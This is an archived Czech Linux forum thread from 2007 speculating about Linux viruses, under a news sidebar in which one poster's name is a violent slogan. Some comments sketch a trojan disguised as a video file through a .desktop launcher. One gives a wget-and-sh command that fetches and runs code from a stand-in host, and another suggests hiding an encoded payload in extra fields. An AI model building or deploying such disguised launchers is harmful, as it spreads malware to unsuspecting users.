abclinuxu.cz AbcLinuxu.cz itbiz.cz ITBiz.cz HDmag.cz HDmag.cz abcprace.cz AbcPráce.cz
AbcLinuxu hledá autory!
Inzerujte na AbcPráce.cz od 950 Kč
Rozšířené hledání
×
    dnes 01:44 | Nová verze

    Byla vydána nová verze 10.0 z Debianu vycházející linuxové distribuce DietPi pro (nejenom) jednodeskové počítače. Přehled novinek v poznámkách k vydání. Vypíchnout lze nové balíčky ownCloud Infinite Scale a Uptime-Kuma.

    Ladislav Hagara | Komentářů: 0
    včera 20:22 | Nová verze

    Enkodér a dekodér SVT-AV1 (Scalable Video Technology for AV1) byl vydán v nové major verzi 4.0.0.

    Ladislav Hagara | Komentářů: 0
    včera 18:44 | Nová verze

    Byla vydána nová verze 3.0.8 svobodné aplikace pro úpravu a vytváření rastrové grafiky GIMP (GNU Image Manipulation Program). Přehled novinek v oznámení o vydání a v souboru NEWS na GitLabu. Nový GIMP je již k dispozici také na Flathubu.

    Ladislav Hagara | Komentářů: 0
    24.1. 11:55 | Humor

    Microsoft poskytl FBI uživatelské šifrovací klíče svého nástroje BitLocker, nutné pro odemčení dat uložených na discích třech počítačů zabavených v rámci federálního vyšetřování. Tento krok je prvním známým případem, kdy Microsoft poskytl klíče BitLockeru orgánům činným v trestním řízení. BitLocker je nástroj pro šifrování celého disku, který je ve Windows defaultně zapnutý. Tato technologie by správně měla bránit komukoli kromě

    … více »
    NUKE GAZA! 🎆 | Komentářů: 32
    24.1. 01:44 | Komunita

    Spotify prostřednictvím svého FOSS fondu rozdělilo 70 000 eur mezi tři open source projekty: FFmpeg obdržel 30 000 eur, Mock Service Worker (MSW) obdržel 15 000 eur a Xiph.Org Foundation obdržela 25 000 eur.

    Ladislav Hagara | Komentářů: 3
    23.1. 18:11 | Zajímavý software

    Nazdar! je open source počítačová hra běžící také na Linuxu. Zdrojové kódy jsou k dispozici na GitHubu. Autorem je Michal Škoula.

    Ladislav Hagara | Komentářů: 3
    23.1. 16:55 | Nová verze

    Po více než třech letech od vydání verze 1.4.0 byla vydána nová verze 1.5.0 správce balíčků GNU Guix a na něm postavené stejnojmenné distribuci GNU Guix. S init systémem a správcem služeb GNU Shepherd. S experimentální podporou jádra GNU Hurd. Na vývoji se podílelo 744 vývojářů. Přibylo 12 525 nových balíčků. Jejich aktuální počet je 30 011. Aktualizována byla také dokumentace.

    Ladislav Hagara | Komentářů: 9
    23.1. 15:44 | Zajímavý software

    Na adrese gravit.huan.cz se objevila prezentace minimalistického redakčního systému GravIT. CMS je napsaný ve FastAPI a charakterizuje se především rychlým načítáním a jednoduchým ukládáním obsahu do textových souborů se syntaxí Markdown a YAML místo klasické databáze. GravIT cílí na uživatele, kteří preferují CMS s nízkými nároky, snadným verzováním (např. přes Git) a možností jednoduchého rozšiřování pomocí modulů. Redakční

    … více »
    2012 | Komentářů: 0
    23.1. 12:55 | Zajímavý software

    Tým Qwen (Alibaba Cloud) uvolnil jako open-source své modely Qwen3‑TTS pro převádění textu na řeč. Sada obsahuje modely VoiceDesign (tvorba hlasu dle popisu), CustomVoice (stylizace) a Base (klonování hlasu). Modely podporují syntézu deseti různých jazyků (čeština a slovenština chybí). Stránka projektu na GitHubu, natrénované modely jsou dostupné na Hugging Face. Distribuováno pod licencí Apache‑2.0.

    NUKE GAZA! 🎆 | Komentářů: 0
    23.1. 01:11 | Nová verze

    Svobodný citační manažer Zotero (Wikipedie, GitHub) byl vydán v nové major verzi 8. Přehled novinek v příspěvku na blogu.

    Ladislav Hagara | Komentářů: 0
    Které desktopové prostředí na Linuxu používáte?
     (18%)
     (5%)
     (0%)
     (10%)
     (22%)
     (3%)
     (5%)
     (2%)
     (11%)
     (34%)
    Celkem 613 hlasů
     Komentářů: 17, poslední 22.1. 15:24
    Rozcestník


    Vložit další komentář
    27.4.2007 13:38 thingie
    Rozbalit Rozbalit vše Re: Linuxové viry a podobná verbež
    Ještě jeden odporník a udělám z tebe fajnovou (leč jenom na jedno použití) součástku T3 :-P (v dobré náladě možná nějaké modernizované verze)
    27.4.2007 13:46 Michal Vyskočil | skóre: 60 | blog: miblog | Praha
    Rozbalit Rozbalit vše Re: Linuxové viry a podobná verbež
    V tomto případě to být jen překlep :-D
    When your hammer is C++, everything begins to look like a thumb.
    27.4.2007 13:49 thingie
    Rozbalit Rozbalit vše Re: Linuxové viry a podobná verbež
    Jó… kdo s čím zachází, tím také schází!
    27.4.2007 17:50 David Jaša | skóre: 44 | blog: Dejvův blog
    Rozbalit Rozbalit vše Re: Linuxové viry a podobná verbež
    Ano, tam jsou místo univerzálních odporníků pouze brzdové. :-)
    27.4.2007 18:10 thingie
    Rozbalit Rozbalit vše Re: Linuxové viry a podobná verbež
    Správně, takže rozjezd přežije.
    27.4.2007 13:44 Lu-Tze | skóre: 15 | blog: Lu-Tzeho blog
    Rozbalit Rozbalit vše Re: Linuxové viry a podobná verbež
    Lepší je sh paris-hilton.wmv.

    Ale nejlepší bude, použít takové ty .desktop soubory (z ~/Desktop), protože lidi si často ukládají věci na plochu. Ty mají samozřejmě i položku Exec...
    27.4.2007 13:45 thingie
    Rozbalit Rozbalit vše Re: Linuxové viry a podobná verbež
    Což. Ono vůbec obecně. Celý svět má tendenci stát se spustitelným kódem což je právě noční můra každého bezpečnobubla.
    27.4.2007 13:50 Michal Vyskočil | skóre: 60 | blog: miblog | Praha
    Rozbalit Rozbalit vše Re: Linuxové viry a podobná verbež
    No vidíš, ze mě sociální inženýr asi nebude :-)
    When your hammer is C++, everything begins to look like a thumb.
    27.4.2007 14:30 Lu-Tze | skóre: 15 | blog: Lu-Tzeho blog
    Rozbalit Rozbalit vše Re: Linuxové viry a podobná verbež
    Ono to fakt není marné, firefox implicitně ukládá na plochu, může to mít ikonku jako video, Name=parishilton.wmv, možná by to v nějaké položce mohlo nést i data (to video). Takže když se na to klikne, spustí se ošklivá akce, pak se rozbalí na plochu soubor s videem, smaže se .desktop soubor, spustí se video v přehrávači...
    27.4.2007 15:42 Michal Vyskočil | skóre: 60 | blog: miblog | Praha
    Rozbalit Rozbalit vše Re: Linuxové viry a podobná verbež
    Koneckonců, v akci může být wget "http://bad.site/virus -O /tmp/virus"; sh /tmp/virus ...
    When your hammer is C++, everything begins to look like a thumb.
    27.4.2007 16:01 Lu-Tze | skóre: 15 | blog: Lu-Tzeho blog
    Rozbalit Rozbalit vše Re: Linuxové viry a podobná verbež
    To jistě může, ale pak je to závislé na funkčnosti bad.site nebo jiné metodě jak ten zlý skript získávat. Lepší by bylo, kdyby to fungovalo i offline. Myslím, že by stačilo použít nějakou položku (položky), která není ve specifikaci, to jsou ty "X-" a do nich vložit (třeba uuencodovaná) data. Příkaz v Exec by měl za úkol rozbalit data a spustit škodlivý kód.
    David Heidelberg avatar 27.4.2007 13:57 David Heidelberg | skóre: 46 | blog: blog_
    Rozbalit Rozbalit vše Re: Linuxové viry a podobná verbež
    Přemýšleli jste někdy o tom co by se stalo kdyby nebyly viry(a spyware atd.)? To by nám potom asi Symantec a další firmy zkrachovaly :-D

    Někdy přemýšlím, jestli náhodou sami neplatí za vývoj(nebo nevyvyjí) virů :-D , aby si každý musel koupit jejich skvělý produkt který ochrání jeho počítač :-D

    0K1AS

    PS: Osobně mně tedy přijde, že ani na Windows(XP SP2,bez WinUpdate) zkušenější uživatel nepotřebuje antivirus. Stačí nespouště exe které člověk si nestahnul z ověřených zdrojů. Samozřejmě i tak je dobré jednou za pl roku to něčím zkontrolovat, ale po 2 letech jsem nepotkal ani virus. :-)
    27.4.2007 14:06 xkesh | skóre: 46 | blog: eXtempore
    Rozbalit Rozbalit vše Re: Linuxové viry a podobná verbež
    PS: Osobně mně tedy přijde, že ani na Windows(XP SP2,bez WinUpdate) zkušenější uživatel nepotřebuje antivirus. Stačí nespouště exe
    Není to tak dávno, co se Windowsy hromadně nakazily pouze surfováním po netu - rozhodně nebylo třeba spouštět žádné .exe. To byl takovej ten virus, co po čase rebootnul systém... je to několik málo let a bylo to opravdu všude. Dokonce obchody nabízely (nevím jestli u nás, ale v Německu ano) k nedávno prodaným počítačům CD s aktualizací a pomocným programem.
    xxx avatar 27.4.2007 14:09 xxx | skóre: 42 | blog: Na Kafíčko
    Rozbalit Rozbalit vše Re: Linuxové viry a podobná verbež
    JJ, stačila jedna záplata od Moftu. Taková veselá hříčka :-).
    Please rise for the Futurama theme song.
    David Heidelberg avatar 27.4.2007 14:10 David Heidelberg | skóre: 46 | blog: blog_
    Rozbalit Rozbalit vše Re: Linuxové viry a podobná verbež
    tak samozřejmě jsem nepoužíval IE :-D , ale FireFox
    27.4.2007 15:15 Václav HFechs Švirga | skóre: 26 | blog: HF | Kopřivnice
    Rozbalit Rozbalit vše Re: Linuxové viry a podobná verbež
    Se SP1 ti to nepomohlo, stačilo mít neaktualizovaný windows (po čisté instalaci do 10 minut, vlastní zkušenost, blbě se to stíhá) a veřejnou IP adresu... Žádny prohlížeč jsi nemusel pustit. Ale samozřejmě že firewall je základ, s ním můžeš mít windows i bez antiviru.
    Baník pyčo!
    Luk avatar 27.4.2007 14:47 Luk | skóre: 47 | blog: Kacířské myšlenky | Kutná Hora
    Rozbalit Rozbalit vše Re: Linuxové viry a podobná verbež
    Ano, to byl to msblaster. Také jsem tehdy chytil tuhle potvoru, měl jsem tehdy z nějakého důvodu ve Windows odstavený firewall (což se ukázalo jako klíčová věc). Ale tenhle červ se dal (v první chvíli, bez informací, o co jde) docela úspěšně eliminovat tím, že se jeho EXE soubor přepsal nějakým jiným (třeba prázdným). Červ pak sice přes port 135 nakoukl do systému, ale když zjistil přítomnost daného souboru, jeho činnost tím skončila.
    Šifrování je absolutní nutnost a pomáhá chránit před nekalými živly
    clipper avatar 27.4.2007 15:37 clipper | skóre: 23 | blog: Nic než tohle
    Rozbalit Rozbalit vše Re: Linuxové viry a podobná verbež
    Jojo, to byl ten, který mne tak štval až jsem přešel na Linux. :-)
    Když selžou všechny pokusy uvést zařízení do provozu, je dobré přečíst si návod.
    27.4.2007 20:40 _____ | skóre: 5 | blog: Poznámky
    Rozbalit Rozbalit vše Re: Linuxové viry a podobná verbež
    Není to tak dávno, co se Windowsy hromadně nakazily pouze surfováním po netu - rozhodně nebylo třeba spouštět žádné .exe. To byl takovej ten virus, co po čase rebootnul systém... je to několik málo let a bylo to opravdu všude.
    To je ta méně závažná polovina. Ve skutečnosti je tato díra zajímavější tím, že na ni existoval Windows exploit jak pro script kiddie, kam stačilo zadat pouze cílovou IP adresu a vyskočil vzdálený příkazový řádek. Jmenovalo se to nějak na způsob DCOM RPC Exploit by DarkSideOfKalez.

    A tomu restartu šlo zabránit nějakým přepínačem od shutdown, tuším shutdown /k nebo shutdown /i.
    xxx avatar 27.4.2007 14:07 xxx | skóre: 42 | blog: Na Kafíčko
    Rozbalit Rozbalit vše Re: Linuxové viry a podobná verbež
    Naprosto souhlasím. Poslední "vir", který jsem na Windows poznal, byl ILY. Jsem ho spustil, abych se podíval jak funguje :-). Firmy jak Symantec apod. nevydělavají díky nějakým zkušeným haxourům, kteří píší sofistikované viry, ale vydělávají jen a pouze na blbosti uživatelů.
    Please rise for the Futurama theme song.
    27.4.2007 14:02 xkesh | skóre: 46 | blog: eXtempore
    Rozbalit Rozbalit vše Re: Linuxové viry a podobná verbež
    Jenže, je (a bude) Linux a především jeho uživatelé v bezpečí?

    Je zajímavé, že se diskutují a připouštějí jakési "viry" pro linuxové systémy, ale zatím nějak nepozoruji, že by se i proti těm hypotetickým plánoval nějaký "antivirák" - a hlavně, jak by asi v Linuxu pracoval - pro každou distribuci zvlášť?
    27.4.2007 14:14 thingie
    Rozbalit Rozbalit vše Re: Linuxové viry a podobná verbež
    Proč by měl. Antivirus není ze strategického pohledu zajímavý, nejde o systémové řešení a nese to tunu problémů.
    Shadow avatar 27.4.2007 14:46 Shadow | skóre: 25 | blog: Brainstorm
    Rozbalit Rozbalit vše Re: Linuxové viry a podobná verbež
    Antivirák (alespoň klasický) už dávno máme - clamav.
    If we do not believe in freedom of speech for those we despise we do not believe in it at all.
    Luk avatar 27.4.2007 14:54 Luk | skóre: 47 | blog: Kacířské myšlenky | Kutná Hora
    Rozbalit Rozbalit vše Re: Linuxové viry a podobná verbež
    ClamAV se výborně hodí pro kontrolu pošty na serveru, ale na desktop jako klasický antivir se nehodí. Je pomalý a pro použití jako on-access scanner ("rezidentní štít") vyžaduje některou z metod integrace do systému (modul Dazuko, AVFS, ClamFS apod.), což není triviální a zatím to snad v žádné distribuci není připraveno.
    Šifrování je absolutní nutnost a pomáhá chránit před nekalými živly
    teekey avatar 27.4.2007 15:00 teekey | skóre: 8 | Brno
    Rozbalit Rozbalit vše Re: Linuxové viry a podobná verbež
    to se bohuzel tyka vsech OS, nejkrytictejsi misto je uzivatel :(
    27.4.2007 16:50 Bubak | skóre: 16 | blog: Čtvrtá cenová
    Rozbalit Rozbalit vše Re: Linuxové viry a podobná verbež
    Zkus si kazdy vyskyt slovicka "vir" v textu nahradit prelozenym "muz", pripadne "manzel":-).

    Jinak hezky sepsane.
    ... máš jen mrtvou kočku a poškrábanýho jezevčíka ...
    27.4.2007 20:52 _____ | skóre: 5 | blog: Poznámky
    Rozbalit Rozbalit vše Re: Linuxové viry a podobná verbež
    Cože? Že viry v Linuxu neexistují? Zkusil sis někdy spustit nějaký pod Wine? :-)
    2.5.2007 19:38 Petr "Glubo" Sýkora | skóre: 21 | blog: Glubnik
    Rozbalit Rozbalit vše Re: Linuxové viry a podobná verbež

    Zkusil, většinou segfaultovaly, nebo na něčem spadly, ale pár se jich zdálo spustitelných. ;)

    „O mrtvých jen v dobrém." „Pojďme se bavit o Stalinovi."
    28.4.2007 10:23 Jiří Jakeš | skóre: 22 | blog: Linuxovna_JJ | Taipei
    Rozbalit Rozbalit vše Re: Linuxové viry a podobná verbež
    Často ukazuji seznam zaznamenaných virů za poslední rok. Jsou tam jen dva viry označené slovíčkem Linux. Ten lepší z nich nakazil jeden počítač ze dvou miliard, ten druhý ze čtyř…
    28.4.2007 11:01 Michal Vyskočil | skóre: 60 | blog: miblog | Praha
    Rozbalit Rozbalit vše Re: Linuxové viry a podobná verbež
    No to ano, protože viry (v klasickém slova významu) a červy mají na Linuxu opravdu velké potíže s přežitím a do stádia ostatních, řekněme uživatelských druhů, virů se Linux ještě nedostal.

    Počet lidí, kteří je umí napsat je malý (takže návratnost je mizivá) a vesměs se jedná o lidi, kteří unixu fandí. Navíc je tu sociální inženýrství složité, pokud mi dojde mail s přílohou Paris.Hilton.desktop (sh, py, pl, ...) tak to poslední, co udělám je, že na to kliknu, dokud nezjistím, o co jde :-) Takto se asi zachová většina uživatelů.

    Na druhou stranu, co se asi stane, až přijde mojí přítelkyni email od kamarádky s přílohou Brad.Pitt.desktop s instrukcemi, ulož na plochu a klikni? ;-)
    When your hammer is C++, everything begins to look like a thumb.
    28.4.2007 11:04 xkesh | skóre: 46 | blog: eXtempore
    Rozbalit Rozbalit vše Re: Linuxové viry a podobná verbež
    Na druhou stranu, co se asi stane, až přijde mojí přítelkyni email od kamarádky s přílohou Brad.Pitt.desktop s instrukcemi, ulož na plochu a klikni? ;-)
    Pak Linux zvítězil :-D
    29.5.2007 22:27 tomfi | skóre: 19
    Rozbalit Rozbalit vše Re: Linuxové viry a podobná verbež
    Sory že to oživuji po takovém čase :)

    Já nevím, ale ze systémového hlediska byla problematika virů vyřešena na většině operačních systémech té doby v 90 letech kdy se zjistilo že je to chyba :) .... microsoft jako jediný nereagoval, a od té doby se objevují pověsti o tom, že windows obsahují viry protože jsou nejrozšířenější.

    Pravdou zůstává, že antivirové firmy se chytli díky jednomu jedinýmu viru a díky super propagaci ( zase odkazuji na historii, jde o to že vytvořili pocit nebezpečí pomocí kvalitní kampaně na kterou skočili snad všechna média a od té doby začali vydělávat... do té doby to byla taková hodně okrajová a poměrně nevýdělečná oblast IT ;) )

    Velice rád bych viděl nehipotetickej "virus" na linuxu .... něco co se samo šíří, škodí... možná by stačilo něco co škodí bez přičinění uživatele ... nemyslím věc typu:Ahoj jsem somálský virus: napiš do konzole: sudo rm -rf / ....

    Problém s ideiologií vytvářenou na základě toho, že by něco MOHlo vzniknout je opravdu hipotetický, nejde o variabilitu, ale o způsob řešení problému. Pokud by takový virus vzniknul tak velice rychle by byla vytvořena oprava chyby, chyby že vůbec virus funguje!!!
    Vždyť jsou to jen jedničky a nuly ...
    12.10.2007 01:11 Honza
    Rozbalit Rozbalit vše Re: Linuxové viry a podobná verbež
    Troufám si tvrdit, že narozdíl od většiny uživatelů Linuxu, jsem na architekturu založenou na Windows jedním z velice erudovaných odborníků, takovým, o jakém se bastličům na linuxu ani nezdá. VBS skript je programovací jazyk, na který se nějaký PERL nebo PHP nedotáhne ani za 20 let. Moc se to neví, v linuxové komunitě obzvlášť, ale pomocí skriptů VBS je např. možné velice jednoduše a efektivně spravovat jakákoliv konta v Active Directory - centrálním systému uložení doménových kont - tedy nejlepším možném způsobu uložení kont. VBS umí věci, o kterých se dětem hrajícím si s linuxem (linux je systém pro děti), ani nesní. Ale co čekat od linuxových amatérů, kteří v životě neviděli Windows Server, že? Takový linuxák umí pouze hloupě pindat.
    5.7.2011 22:49 Linuxátor
    Rozbalit Rozbalit vše Re: Linuxové viry a podobná verbež
    xD :D !!!! sudo kill all windows & sudo apt-get install linux & sudo apt-get update ... xD

    Založit nové vláknoNahoru

    Tiskni Sdílej: Linkuj Jaggni to Vybrali.sme.sk Google Del.icio.us Facebook

    ISSN 1214-1267   www.czech-server.cz
    © 1999-2015 Nitemedia s. r. o. Všechna práva vyhrazena.